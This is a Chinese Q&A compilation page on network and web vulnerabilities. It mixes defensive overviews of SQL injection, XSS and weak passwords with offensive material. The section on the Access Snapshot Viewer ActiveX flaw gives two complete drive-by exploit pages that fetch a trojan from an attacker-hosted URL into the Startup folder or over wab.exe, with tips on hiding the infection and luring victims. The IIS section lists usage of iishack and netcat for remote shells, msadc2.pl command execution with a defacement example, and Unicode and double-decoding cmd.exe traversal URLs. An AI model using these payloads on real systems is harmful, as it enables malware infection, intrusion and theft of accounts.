【熱心相助】
您好!
網路系統本身存在的安全漏洞:
1.
應用軟體漏洞(研發、設計、編程、測試、應用中出現的);
2.
網路操作系統漏洞
3.
網路協議漏洞
4.
網站和站點安全隱患
5.
網路資料庫漏洞;
6.
網路系統管理和應用方面的漏洞
參考:網路安全實用技術,清華大學出版社,賈鐵軍主編
㈡ Web應用常見的安全漏洞有哪些
Web應用常見的安全漏洞:
1、SQL注入
注入是一個安全漏洞,允許攻擊者通過操縱用戶提供的數據來更改後端SQL語句。當用戶輸入作為命令或查詢的一部分被發送到解釋器並且欺騙解釋器執行非預期的命令並且允許訪問未授權的數據時,發生注入。
2、跨站腳本攻擊 (XSS)
XSS漏洞針對嵌入在客戶端(即用戶瀏覽器而不是伺服器端)的頁面中嵌入的腳本。當應用程序獲取不受信任的數據並將其發送到Web瀏覽器而未經適當驗證時,可能會出現這些缺陷。
3、跨站點請求偽造
CSRF攻擊是指惡意網站,電子郵件或程序導致用戶的瀏覽器在用戶當前已對其進行身份驗證的受信任站點上執行不需要的操作時發生的攻擊。
4、無法限制URL訪問
Web應用程序在呈現受保護的鏈接和按鈕之前檢查URL訪問許可權 每次訪問這些頁面時,應用程序都需要執行類似的訪問控制檢查。通過智能猜測,攻擊者可以訪問許可權頁面。攻擊者可以訪問敏感頁面,調用函數和查看機密信息。
5、不安全的加密存儲
不安全的加密存儲是一種常見的漏洞,在敏感數據未安全存儲時存在。用戶憑據,配置文件信息,健康詳細信息,信用卡信息等屬於網站上的敏感數據信息。
(2)資料庫漏洞都有哪些擴展閱讀
web應用漏洞發生的市場背景:
由於Web伺服器提供了幾種不同的方式將請求轉發給應用伺服器,並將修改過的或新的網頁發回給最終用戶,這使得非法闖入網路變得更加容易。
許多程序員不知道如何開發安全的應用程序。他們的經驗也許是開發獨立應用程序或Intranet Web應用程序,這些應用程序沒有考慮到在安全缺陷被利用時可能會出現災難性後果。
許多Web應用程序容易受到通過伺服器、應用程序和內部已開發的代碼進行的攻擊。這些攻擊行動直接通過了周邊防火牆安全措施,因為埠80或443(SSL,安全套接字協議層)必須開放,以便讓應用程序正常運行。
㈢ 常見的漏洞類型有哪些
SQL 注入攻擊( SQL Injection ),簡稱注入攻擊、SQL 注入,被廣泛用於非法獲取網站控制權, 是發生在應用程序的資料庫層上的安全漏洞。在設計程序,忽略了對輸入字元串中夾帶的SQL 指令的檢查,被資料庫誤認為是正常的SQL 指令而運行,從而使資料庫受到攻擊,可能導致數據被竊取、更改、刪除,以及進一步導致網站被嵌入惡意代碼、被植入後門程序等危害。
通常情況下, SQL 注入的位置包括:
(1)表單提交,主要是POST 請求,也包括GET 請求;
(2)URL 參數提交,主要為GET 請求參數;
(3)Cookie 參數提交;
(4)HTTP 請求頭部的一些可修改的值,比如Referer 、User_Agent 等;
(5)一些邊緣的輸入點,比如.mp3 文件的一些文件信息等。
SQL 注入的危害不僅體現在資料庫層面上, 還有可能危及承載資料庫的操作系統;如果SQL 注入被用來掛馬,還可能用來傳播惡意軟體等,這些危害包括但不局限於:
(1)資料庫信息泄漏:資料庫中存放的用戶的隱私信息的泄露。作為數據的存儲中心,資料庫里往往保存著各類的隱私信息, SQL 注入攻擊能導致這些隱私信息透明於攻擊者。
(2)網頁篡改:通過操作資料庫對特定網頁進行篡改。
(3)網站被掛馬,傳播惡意軟體:修改資料庫一些欄位的值,嵌入網馬鏈接,進行掛馬攻擊。
(4)資料庫被惡意操作:資料庫伺服器被攻擊,資料庫的系統管理員帳戶被篡改。
(5)伺服器被遠程式控制制,被安裝後門。經由資料庫伺服器提供的操作系統支持,讓黑客得以修改或控制操作系統。
(6)破壞硬碟數據,癱瘓全系統。
解決SQL 注入問題的關鍵是對所有可能來自用戶輸入的數據進行嚴格的檢查、對資料庫配置使用最小許可權原則。通常使用的方案有:
(1 )所有的查詢語句都使用資料庫提供的參數化查詢介面,參數化的語句使用參數而不是將用戶輸入變數嵌入到SQL 語句中。當前幾乎所有的資料庫系統都提供了參數化SQL 語句執行介面,使用此介面可以非常有效的防止SQL 注入攻擊。
(2 )對進入資料庫的特殊字元( '"<>&*; 等)進行轉義處理,或編碼轉換。
(3 )確認每種數據的類型,比如數字型的數據就必須是數字,資料庫中的存儲欄位必須對應為int 型。
(4)數據長度應該嚴格規定,能在一定程度上防止比較長的SQL 注入語句無法正確執行。
(5)網站每個數據層的編碼統一,建議全部使用UTF-8 編碼,上下層編碼不一致有可能導致一些過濾模型被繞過。
(6)嚴格限制網站用戶的資料庫的操作許可權,給此用戶提供僅僅能夠滿足其工作的許可權,從而最大限度的減少注入攻擊對資料庫的危害。
(7)避免網站顯示SQL 錯誤信息,比如類型錯誤、欄位不匹配等,防止攻擊者利用這些錯誤信息進行一些判斷。
(8)在網站發布之前建議使用一些專業的SQL 注入檢測工具進行檢測,及時修補這些SQL 注入漏洞。
跨站腳本攻擊( Cross-site scripting ,通常簡稱為XSS)發生在客戶端,可被用於進行竊取隱私、釣魚欺騙、竊取密碼、傳播惡意代碼等攻擊。XSS 攻擊使用到的技術主要為HTML 和javascript ,也包括VBScript和ActionScript 等。XSS 攻擊對WEB 伺服器雖無直接危害,但是它藉助網站進行傳播,使網站的使用用戶受到攻擊,導致網站用戶帳號被竊取,從而對網站也產生了較嚴重的危害。
XSS 類型包括:
(1)非持久型跨站: 即反射型跨站腳本漏洞, 是目前最普遍的跨站類型。跨站代碼一般存在於鏈接中,請求這樣的鏈接時,跨站代碼經過服務端反射回來,這類跨站的代碼不存儲到服務端(比如資料庫中)。上面章節所舉的例子就是這類情況。
(2)持久型跨站:這是危害最直接的跨站類型,跨站代碼存儲於服務端(比如資料庫中)。常見情況是某用戶在論壇發貼,如果論壇沒有過濾用戶輸入的Javascript 代碼數據,就會導致其他瀏覽此貼的用戶的瀏覽器會執行發貼人所嵌入的Javascript 代碼。
(3)DOM 跨站(DOM XSS ):是一種發生在客戶端DOM (Document Object Model 文檔對象模型)中的跨站漏洞,很大原因是因為客戶端腳本處理邏輯導致的安全問題。
XSS 的危害包括:
(1)釣魚欺騙:最典型的就是利用目標網站的反射型跨站腳本漏洞將目標網站重定向到釣魚網站,或者注入釣魚JavaScript 以監控目標網站的表單輸入,甚至發起基於DHTML 更高級的釣魚攻擊方式。
(2 )網站掛馬:跨站時利用IFrame 嵌入隱藏的惡意網站或者將被攻擊者定向到惡意網站上,或者彈出惡意網站窗口等方式都可以進行掛馬攻擊。
(3)身份盜用: Cookie 是用戶對於特定網站的身份驗證標志, XSS 可以盜取到用戶的Cookie ,從而利用該Cookie 盜取用戶對該網站的操作許可權。如果一個網站管理員用戶Cookie 被竊取,將會對網站引發巨大的危害。
(4)盜取網站用戶信息:當能夠竊取到用戶Cookie 從而獲取到用戶身份使,攻擊者可以獲取到用戶對網站的操作許可權,從而查看用戶隱私信息。
(5)垃圾信息發送:比如在SNS 社區中,利用XSS 漏洞借用被攻擊者的身份發送大量的垃圾信息給特定的目標群。
(6)劫持用戶Web 行為:一些高級的XSS 攻擊甚至可以劫持用戶的Web 行為,監視用戶的瀏覽歷史,發送與接收的數據等等。
(7)XSS 蠕蟲:XSS 蠕蟲可以用來打廣告、刷流量、掛馬、惡作劇、破壞網上數據、實施DDoS 攻擊等。
常用的防止XSS 技術包括:
(1)與SQL 注入防護的建議一樣,假定所有輸入都是可疑的,必須對所有輸入中的script 、iframe 等字樣進行嚴格的檢查。這里的輸入不僅僅是用戶可以直接交互的輸入介面,也包括HTTP 請求中的Cookie 中的變數, HTTP 請求頭部中的變數等。
(2 )不僅要驗證數據的類型,還要驗證其格式、長度、范圍和內容。
(3)不要僅僅在客戶端做數據的驗證與過濾,關鍵的過濾步驟在服務端進行。
( 4)對輸出的數據也要檢查, 資料庫里的值有可能會在一個大網站的多處都有輸出,即使在輸入做了編碼等操作,在各處的輸出點時也要進行安全檢查。
(5)在發布應用程序之前測試所有已知的威脅。
弱口令(weak password) 沒有嚴格和准確的定義,通常認為容易被別人(他們有可能對你很了解)猜測到或被破解工具破解的口令均為弱口令。設置密碼通常遵循以下原則:
(1)不使用空口令或系統預設的口令,這些口令眾所周之,為典型的弱口令。
(2)口令長度不小於8 個字元。
(3)口令不應該為連續的某個字元(例如: AAAAAAAA )或重復某些字元的組合(例如: tzf.tzf. )。
(4)口令應該為以下四類字元的組合,大寫字母(A-Z) 、小寫字母(a-z) 、數字(0-9) 和特殊字元。每類字元至少包含一個。如果某類字元只包含一個,那麼該字元不應為首字元或尾字元。
(5)口令中不應包含本人、父母、子女和配偶的姓名和出生日期、紀念日期、登錄名、E-mail 地址等等與本人有關的信息,以及字典中的單詞。
(6)口令不應該為用數字或符號代替某些字母的單詞。
(7)口令應該易記且可以快速輸入,防止他人從你身後很容易看到你的輸入。
(8)至少90 天內更換一次口令,防止未被發現的入侵者繼續使用該口令。
HTTP/1.1 (RFC2616 )規范定義了HTTP TRACE 方法,主要是用於客戶端通過向Web 伺服器提交TRACE 請求來進行測試或獲得診斷信息。當Web 伺服器啟用TRACE 時,提交的請求頭會在伺服器響應的內容(Body )中完整的返回,其中HTTP 頭很可能包括Session Token 、Cookies 或其它認證信息。攻擊者可以利用此漏洞來欺騙合法用戶並得到他們的私人信息。該漏洞往往與其它方式配合來進行有效攻擊,由於HTTP TRACE 請求可以通過客戶瀏覽器腳本發起(如XMLHttpRequest ),並可以通過DOM 介面來訪問,因此很容易被攻擊者利用。防禦HTTP 報頭追蹤漏洞的方法通常禁用HTTP TRACE 方法。
Apache Struts 是一款建立Java web 應用程序的開放源代碼架構。Apache Struts 存在一個輸入過濾錯誤,如果遇到轉換錯誤可被利用注入和執行任意Java 代碼。網站存在遠程代碼執行漏洞的大部分原因是由於網站採用了Apache Struts Xwork 作為網站應用框架,由於該軟體存在遠程代碼執高危漏洞,導致網站面臨安全風險。CNVD 處置過諸多此類漏洞,例如:「 GPS 車載衛星定位系統」網站存在遠程命令執行漏洞(CNVD-2012-13934) ;Aspcms 留言本遠程代碼執行漏洞( CNVD-2012-11590 )等。
修復此類漏洞,只需到Apache 官網升級Apache Struts 到最新版本
框架注入攻擊是針對Internet Explorer 5 、Internet Explorer 6 、與Internet Explorer 7 攻擊的一種。這種攻擊導致Internet Explorer 不檢查結果框架的目的網站,因而允許任意代碼像Javascript 或者VBScript 跨框架存取。這種攻擊也發生在代碼透過多框架注入,肇因於腳本並不確認來自多框架的輸入。這種其他形式的框架注入會影響所有的不確認不受信任輸入的各廠商瀏覽器和腳本。如果應用程序不要求不同的框架互相通信,就可以通過完全刪除框架名稱、使用匿名框架防止框架注入。但是,因為應用程序通常都要求框架之間相互通信,因此這種方法並不可行。因此,通常使用命名框架,但在每個會話中使用不同的框架,並且使用無法預測的名稱。一種可行的方法是在每個基本的框架名稱後附加用戶的會話令牌,如main_display 。
文件上傳漏洞通常由於網頁代碼中的文件上傳路徑變數過濾不嚴造成的,如果文件上傳功能實現代碼沒有嚴格限制用戶上傳的文件後綴以及文件類型,攻擊者可通過Web 訪問的目錄上傳任意文件,包括網站後門文件( webshell ),進而遠程式控制制網站伺服器。因此,在開發網站及應用程序過程中,需嚴格限制和校驗上傳的文件,禁止上傳惡意代碼的文件。同時限制相關目錄的執行許可權,防範webshell 攻擊。
由於測試腳本對提交的參數數據缺少充分過濾,遠程攻擊者可以利用洞以WEB 進程許可權在系統上查看任意文件內容。防禦此類漏洞通常需嚴格過濾提交的數據,有效檢測攻擊。
IP 地址是網路用戶的重要標示,是攻擊者進行攻擊前需要了解的。獲取的方法較多,攻擊者也會因不同的網路情況採取不同的方法,如:在區域網內使用Ping 指令, Ping 對方在網路中的名稱而獲得IP;在Internet 上使用IP 版的QQ直接顯示。最有效的辦法是截獲並分析對方的網路數據包。攻擊者可以找到並直接通過軟體解析截獲後的數據包的IP 包頭信息,再根據這些信息了解具體的IP。針對最有效的「數據包分析方法」而言,就可以安裝能夠自動去掉發送數據包包頭IP 信息的一些軟體。不過使用這些軟體有些缺點, 譬如:耗費資源嚴重,降低計算機性能;訪問一些論壇或者網站時會受影響;不適合網吧用戶使用等等。現在的個人用戶採用最普及隱藏IP 的方法應該是使用代理,由於使用代理伺服器後,「轉址服務」會對發送出去的數據包有所修改,致使「數據包分析」的方法失效。一些容易泄漏用戶IP 的網路軟體(QQ 、MSN 、IE 等)都支持使用代理方式連接Internet ,特別是QQ 使用「 ezProxy 」等代理軟體連接後, IP 版的QQ 都無法顯示該IP 地址。雖然代理可以有效地隱藏用戶IP,但攻擊者亦可以繞過代理, 查找到對方的真實IP 地址,用戶在何種情況下使用何種方法隱藏IP,也要因情況而論。
由於Web 配置不安全, 登陸請求把諸如用戶名和密碼等敏感欄位未加密進行傳輸, 攻擊者可以竊聽網路以劫獲這些敏感信息。建議進行例如SSH 等的加密後再傳輸。
SQL 注入、XSS、目錄遍歷、弱口令等均可導致敏感信息泄露,攻擊者可以通過漏洞獲得敏感信息。針對不同成因,防禦方式不同。
㈣ Access資料庫的漏洞有那些哪位高手指教一下!
有網頁自己看也行..看我發的也行: http://www.chinaz.com/Program/Access/0Z93KC2008.html Access漏洞威脅的潛在人群十分巨大。目前已經有不少利用該漏洞的惡意網站了,一旦用戶訪問這些頁面就會被植入木馬下載器,這些木馬下載器成功進入用戶系統並執行後,就會下載其他的惡意程序木馬,試圖盜取用戶的QQ、網游等賬號,危險不言而喻。 本次Access漏洞除Office2007版本外,在以前的版本中廣泛存在。由於用戶在安裝Office的時候很多都是選擇的默認安裝,附帶也安裝了Access,所以漏洞威脅的用戶群數量非常的巨大。 HTTP GET功能導致漏洞出現 本次的Access漏洞的全名稱為「Microsoft Office Snapshot Viewer ActiveX Exploit 漏洞」,是一個ActiveX控制項漏洞。該漏洞存在於snapview.ocx控制項中,出現的原因是因為該控制項具有HTTP GET功能,這個功能可以從指定的網址下載指定的文件。 黑客要利用該漏洞,先要特製一個惡意網站引誘用戶訪問。當用戶打開該網頁的時候,惡意網址就賦給了HTTP GET功能,該功能被激活後就偷偷從惡意網址下載病毒,這樣病毒就可以神不知鬼不覺地進入用戶的系統中,威脅用戶的各種賬號和密碼。受這個漏洞影響的Access版本有2003、2002、2000。 Access漏洞解決方案 方案1:現在已經有了該漏洞的補丁了,請大家趕快到 http://www.shudoo.com/bzsoft 下載。此外,我們還可以在「工具→Internet選項→安全」中,選擇「Internet」圖標,然後將下面的安全級別中設置為「高」(圖3),這樣可以有效地阻止網頁木馬入侵。 圖3 方案2 :將以下內容復制在記事本中,另存為1.reg,然後雙擊導入注冊表也可以堵上漏洞。 Windows Registry Editor Version 5.00 [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{F0E42D50-368C-11D0-AD81-00A0C90DC8D9}] 「Compatibility Flags」=dword:00000400 [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{F0E42D60-368C-11D0-AD81-00A0C90DC8D9}] 「Compatibility Flags」=dword:00000400 [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{F2175210-368C-11D0-AD81-00A0C90DC8D9}] 「Compatibility Flags」=dword:00000400 目前黑客利用Access漏洞的主要方式 方式1:寫入啟動項 先申請一個免費的Web空間,用Mini downloader by SEC配置網頁木馬,在「URL」處輸入網頁木馬地址,再點擊「Creat」,又再彈出窗口中將文件保存為test.exe,這樣就網頁木馬就配置好了。 接著將test.exe上傳到先前申請的免費空間裡面,病毒地址就是:http://(這里是申請的空間地址)/test.exe 。將以下漏洞的利用代碼復制粘貼到新建的記事本里,另存為test.html。 <html> <object classid='clsid:F0E42D50-368C-11D0-AD81-00A0C90DC8D9′ id='obj'></object> <script language='javascript'> var buf1 = 『http://(這里是申請的空間地址)/test.exe'; var buf2 = 『C:/Documents and Settings/All Users/「開始」菜單/程序/啟動/test.exe'; obj.SnapshotPath = buf1; obj.CompressedPath = buf2; </script> </html> 最後將test.html上傳到空間里,得到病毒的訪問地址:http://(這里是空間地址)/test.html。做到這步,剩下的工作就是傳播網址引誘用戶訪問了。當用戶訪問該網頁時就會中招,用戶的電腦會在啟動項里出現test.exe文件。 點評: 這種方式有個缺點,就是有些安全軟體會提示有程序寫入啟動項。 方式2:不寫入啟動項 將以下代碼復制到新建的記事本中,另存為test.html上傳到空間即可。當用戶訪問該網頁時也會中招,不過啟動項里沒有test.exe文件,用戶無法察覺自己中毒了。 <html> <body> <script type="text/javascript"> function killErrors() { return true; } window.onerror = killErrors; var x; var obj; var mycars = new Array(); mycars[0] = "C:/Program Files/Outlook Express/wab.exe"; mycars[1] = "d:/Program Files/Outlook Express/wab.exe"; var objlcx = new ActiveXObject("snpvw.Snapshot Viewer Control.1"); if(objlcx="[object]") { setTimeout('window.location = "[url=ldap://"]ldap://"',3000[/url]); for (x in mycars) { obj = new ActiveXObject("snpvw.Snapshot Viewer Control.1") var buf1 = 'http://(這里是申請的空間地址)/test.exe'; var buf2=mycars[x]; obj.Zoom = 0; obj.ShowNavigationButtons = false; obj.AllowContextMenu = false; obj.SnapshotPath = buf1; try { obj.CompressedPath = buf2; obj.PrintSnapshot(); }catch(e){} } } </script> </body> </html> 點評: 這種方式無需寫入啟動項,這樣安全軟體就不會有任何提示了,在用戶訪問惡意頁面的時候直接中馬,使用戶中馬的概率更高。
㈤ 常見的網路漏洞有哪些
你說的漏洞比較廣,是軟體漏洞還是系統 系統漏洞還有server漏洞還有iis漏洞 我就和你說說iis漏洞吧。1. iis4hack緩沖溢出
主要存在於.htr,.idc和.stm文件中,其對關於這些文件的URL請求沒有對名字進行充分的邊界檢查,導致運行攻擊者插入一些後門程序 在系統中下載和執行程序。要檢測這樣的站點你需要兩個文件iishack.exe,ncx.exe,你可以到下面 的站點www.technotronic.com去下載,另外你還需要一台自己的WEB伺服器。你現在你自己的WEB伺服器上運行WEB服務程序並把ncx.exe放到你自己相應的目錄下,然後使用iishack.exe來檢查目標機器:
c:>iishack.exe <victim> 80 <your web server>/ncx.exe
然後你就使用netcat來連接你要檢測的伺服器:
c:>nc <victim> 80
如果溢出點正確你就可以看到目標機器的命令行提示,並且是管理遠許可權。利用程序見iis4hack.zip
2.msadc
IIS的MDAC組件存在一個漏洞可以導致攻擊者遠程執行你系統的命令。主要核心問題是存在於RDS Datafactory,默認情況下, 它允許遠程命令發送到IIS伺服器中,這命令會以設備用戶的身份運行,其一般默認情況下是SYSTEM用戶。利用程序為msadc2.pl,我們看看它的help
[quack@chat quack]$ perl msadc2.pl -h
-- RDS smack v2 - rain forest puppy / ADM / wiretrip --
Usage: msadc.pl -h <host> { -d <delay> -X -v }
-h <host> = host you want to scan (ip or domain)
-d <seconds> = delay between calls, default 1 second
-X = mp Index Server path table, if available
-N = query VbBusObj for NetBIOS name
-V = use VbBusObj instead of ActiveDataFactory
-v = verbose
-e = external dictionary file for step 5
-u <\hostsharefile> = use UNC file
-w = Windows 95 instead of Windows NT
-c = v1 compatibility (three step query)
-s <number> = run only step <number>
Or a -R will resume a (v2) command session
[quack@chat quack]$ perl msadc2.pl -h http://www.targe.com/
-- RDS smack v2 - rain forest puppy / ADM / wiretrip --
Type the command line you want to run (cmd /c assumed):
cmd /c
如果出現cmd /c後,直接鍵入命令行,就可以以system許可權執行命令了。比如xundi教的:
echo hacked by me > d:inetpubwwwrootvictimwebindex.htm
3.Codebrws.asp
察看文件源代碼
http://www.victim.com/iisamples/exair/howitworks/codebrws.asp?source=/iisamples/exair/howitworks/codebrws.asp
4.Showcode.asp
察看文件源代碼
http://www.victim.com/msadc/samples/selector/showcode.asp?source=/msadc/../../../../../winnt/win.ini
5.Null.htw
察看文件源代碼
http://www.victim.com/null.htw?CiWebhitsfile=/default.asp%20&%20CiRestriction=none%20&%20&CiHiliteType=full
6.webhits.dll & .htw
hit-highligting功能是由Index Server提供的允許一個WEB用戶在文檔上highlighted(突出)他們原始搜索的條目,這個文檔的名字通過變數CiWebhitsfile傳遞給.htw文件,Webhits.dll是一個ISAPI應用程序 來處理請求,打開文件並返回結果,當用戶控制了CiWebhitsfile參數傳遞給.htw時,他們就可以請求任意文件,結果就是導致查看ASP源碼和其他腳本文件內容。要了解你是否存在這個漏洞,你可以請求如下條目:
http://www.victim.com/nosuchfile.htw 如果你從伺服器端獲得如下信息:
format of the QUERY_STRING is invalid這就表示你存在這個漏洞 .這個問題主要就是webhits.dll關聯了.htw文件的映射,所以你只要取消
這個映射就能避免這個漏洞,你可以在你認為有漏洞的系統中搜索.htw文件,一般會發現如下的程序:
/iissamples/issamples/oop/qfullhit.htw
/iissamples/issamples/oop/qsumrhit.htw
/isssamples/exair/search/qfullhit.htw
/isssamples/exair/search/qsumrhit.htw
/isshelp/iss/misc/iirturnh.htw (這個一般為loopback使用)
一個攻擊者可以使用如下的方法來訪問系統中文件的內容:
http://www.victim.com/iissamples/issamples/oop/qfullhit.htw?
ciwebhitsfile=/../../winnt/win.ini&cirestriction=none&cihilitetype=full
就會在有此漏洞系統中win.ini文件的內容。 7.ASP Alternate Data Streams(::$DATA) 要查看一些.asp文件的內容,你可以請求如下的URL: http://www.victim.com/default.asp::$DATA你就得到了源代碼
8.ASP Dot Bug
在請求的URL結尾追加一個或者多個點導致泄露ASP源代碼。
http://www.victim.com/sample.asp.
9.ISM.DLL
這個漏洞是由Cerberus Information Security team.最早發現的,它運行在IIS4.0和5.0上面,允許攻擊者查看任意文件內容和源代碼。通過在文件名後面追加近230個+或者?%20?(這些表示空格)並追加?.htr?的特殊請求給IIS,會使IIS認為客戶端請求的是?.htr?文件,而.htr文件的後綴映射到ISM.DLL ISAPI應用程序,這樣IIS就把這個.htr請求轉交給這個DLL文件,然後ISM.DLL 程序把傳遞過來的文件打開和執行,但在ISM.DLL 截斷信息之前,緩沖區發送 一個截斷開的 .Htr 並會有一些時間去返回一些你要打開的文件內容. 除非 WEB 服務停止並重啟過,否則這攻擊只能有效執行一次。如果已經發送過一個 .htr 請求到機器上,那麼這攻擊會失效.它只能在 ISM.DLL第一次裝入內存時工作.CNNS發現追加+號到沒有一次攻擊這個問題,可以進行多次攻擊。
http://www.victim.com/global.asa%20%20(...<=230)global.asa.htr
10. .idc & .ida Bugs
這個漏洞實際上類似ASP dot 漏洞,其能在IIS4.0上顯示其WEB目錄信息,很奇怪的說有些還在IIS5.0上發現過此類漏洞,通過增加?idc?或者?ida? 後綴到URL會導致IIS嘗試允許通過資料庫連接程序.DLL來運行.IDC,如果此.idc不存在,它就返回一些信息給客戶端。
http://www.victim.com/anything.idc 或者 anything.idq
11.+.htr Bug
對有些ASA和ASP追加+.htr的URL請求就會導致文件源代碼的泄露:
http://www.victim.com/global.asa+.htr
12.NT Site Server Adsamples
通過請求site.csc,一般保存在/adsamples/config/site.csc中,攻擊者 可能獲得一些如資料庫中的DSN,UID和PASS的一些信息,如:
http://www.victim.com/adsamples/config/site.csc
13./iisadmpwd
IIS4.0中包含一個有趣的特徵就是允許遠程用戶攻擊WEB伺服器上的用戶帳號,就是你的WEB伺服器是通過NAT來轉換地址的,還可以被攻擊。 每個IIS4.0安裝的時候建立一個虛擬目錄/iisadmpwd,這個目錄包含多個 .htr文件,匿名用戶允許訪問這些文件,這些文件剛好沒有規定只限制 在loopback addr(127.0.0.1),請求這些文件就跳出對話框讓你通過WEB來修改用戶的帳號和密碼。這個目錄物理映射在下面的目錄下:
c:winntsystem32inetsrviisadmpwd
Achg.htr
Aexp.htr
Aexp2.htr
Aexp2b.htr
Aexp3.htr
Aexp4.htr
Aexp4b.htr
Anot.htr
Anot3.htr
這樣,攻擊者可以通過暴力來猜測你的密碼。
14.Translate:f Bug
泄露asp文件源代碼 存在OFFICE 2000和FRONTPAGE 2000Server Extensions中的WebDAV中, 當有人請求一個ASP/ASA後者其他任意腳本的時候在HTTP GET加上Translate:f 後綴,並在請求文件後面加/就會顯示文件代碼,當然在沒有打WIN2K SP1補丁 為前提。這個是W2K的漏洞,但由於FP2000也安裝在IIS4.0上,所以在IIS4.0上也有這個漏洞。利用程序: trasn1.pl,trans2.pl
15.Unicode
IIS 4.0和IIS 5.0在Unicode字元解碼的實現中存在一個安全漏洞,導致用戶可以遠程通過IIS執行任意命令。當IIS打開文件時,如果該文件名包含unicode字元,它會對其進行解碼,如果用戶提供一些特殊 的編碼,將導致IIS錯誤的打開或者執行某些web根目錄以外的文件。
http://www.victim.com/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir
http://www.victim.com/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir
http://www.victim.com/scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir
http://www.victim.com/a.asp/..%c1%1c../..%c1%1c../winnt/win.ini
可能需要察看以下幾個目錄
GET
/scripts/..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\
HTTP/1.0rnrn
GET
/msadc/..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\
HTTP/1.0rnrn
GET
/_vti_bin/..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\
HTTP/1.0rnrn
GET
/_mem_bin/..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\
HTTP/1.0rnrn
GET
/cgi-bin/..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\
HTTP/1.0rnrn
eeye開發了工具包iishack1.5針對這一漏洞進行測試
16.iis5.0 緩沖溢出
微軟Win 2K IIS
5的列印ISAPI擴展介面建立了.printer擴展名到msw3prt.dll的映射關系,預設情況下該映射存在。當遠程用戶提交對.printer的URL請求時,IIS
5調用msw3prt.dll解釋該請求。由於msw3prt.dll缺乏足夠的緩沖區邊界檢查,遠程用戶可以提交一個精心構造的針對.printer的URL請求,其"Host:"域包含大約420位元組的數據,此時在msw3prt.dll中發生典型的緩沖區溢出,潛在允許執行任意代碼。溢出發生後,WEB服務停止響應,Win 2K可以檢查到WEB服務停止響應,從而自動重啟它,因此系統管理員很難意識到發生過攻擊。利用程序見iis5hack.zip
17.IIS CGI文件名二次解碼漏洞
IIS在載入可執行CGI程序時,會進行兩次解碼。第一次解碼是對CGI文件名進行http解碼,然後判斷此文件名是否為可執行文件,例如檢查後綴名是否為".exe"或".com"等等。在文件名檢查通過之後,IIS會再進行第二次解碼。正常情況下,應該只對該CGI的參數進行解碼,然而,IIS錯誤地將已經解碼過的CGI文件名和CGI參數一起進行解碼。這樣,CGI文件名就被錯誤地解碼了兩次。
通過精心構造CGI文件名,攻擊者可以繞過IIS對文件名所作的安全檢查,例如對"../"或"./"的檢查,在某些條件下,攻擊者可以執行任意系統命令。
例如,對於』』這個字元,正常編碼後是%5c。這三個字元對應的編碼為:
』%』 = %25
』5』 = %35
』c』 = %63
如果要對這三個字元再做一次編碼,就可以有多種形式,例如:
%255c
%%35c
%%35%63
%25%35%63
...
因此,".."就可以表示成"..%255c"或"..%%35c"等等形式。在經過第一次解碼之後,變成"..%5c"。IIS會認為這是一個正常的字元串,不會違反安全規則檢查。而在第二次被解碼之後,就會變成".."。因此攻擊者就可以使用".."來進行目錄遍歷,執行web目錄之外的任意程序。 好了 先到這里。。。。漏洞太多了不過還是微軟系統排第一的 一個是使用的人群廣 一個是XXX 哈哈哈